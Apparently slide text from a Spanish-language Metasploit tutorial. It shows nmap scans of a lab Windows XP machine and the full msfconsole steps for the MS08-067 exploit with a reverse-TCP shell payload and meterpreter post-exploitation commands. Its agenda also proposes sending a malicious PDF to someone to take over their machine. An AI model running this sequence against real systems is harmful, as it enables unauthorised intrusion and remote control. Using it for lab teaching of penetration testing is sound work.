Download - Metasploit2
• REALIZAR ESCANEO DE PUERTOS
• VULNERAR SERVIDOR APACHE Y TOMAR CONTROL DE LA MÁQUINA QUE LO CORRE
• GENERAR PDF MALICIOSO(VIRUS) ENVIARLO A ALGUIEN Y TOMAR EL CONTROL DE LA MÁQUINA DE ESE ALGUIEN =P
• OTRO HACK MÁS SI ES QUE DA TIEMPO
root@bt:~#nmap –sS –Pn ip
• -sS <=Determina si un puerto esta abierto (TCP)
• -Pn <=Le dice a nmap que no use ping para determinar si un sistema esta activo
(útil cuando en la red no se permiten paquetes ICMP)
root@bt:~# nmap -sS -Pn 172.16.32.131 Nmap scan report for 172.16.32.131 Host is up (0.00057s latency). Not shown: 990 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s 3389/tcp open ms-term-serv Nmap done: 1 IP address (1 host up) scanned in 14.34 seconds
root@bt:~# nmap -Pn -sS -A 172.16.32.131 Nmap scan report for 172.16.32.131 Host is up (0.0035s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 777/tcp open unknown 1138/tcp open msrpc Microsoft Windows RPC 1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399; RTM Device type: general purpose Running: Microsoft Windows XP|2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop Service Info: OS: Windows Host script results: |_nbstat: NetBIOS name: V-MAC-XP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c9:38:4c (VMware) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Name: WORKGROUP\V-MAC-XP
• msf> show exploits | grep exploit
• msf> show auxiliary
• msf> search mysql
• msf exploit(ms08_067_netapi) >show targets
• msf exploit(ms08_067_netapi) >info
• msf> use windows/smb/ms08_067_netapi
• msf exploit(ms08_067_netapi) > back
• msf> show options
• msf > show payloads
• msf exploit(ms08_067_netapi) >set payload windows/shell/reverse_tcp
• msf exploit(ms08_067_netapi) >set RHOST ip
• msf exploit(ms08_067_netapi) >set LHOST ip
• msf exploit(ms08_067_netapi) >set LPORT port
• msf exploit(ms08_067_netapi) >exploit
• meterpreter>screenshot
• meterpreter>sysinfo
• meterpreter>ps
• meterpreter>migrate 1668
• meterpreter>getuid
• meterpreter>shell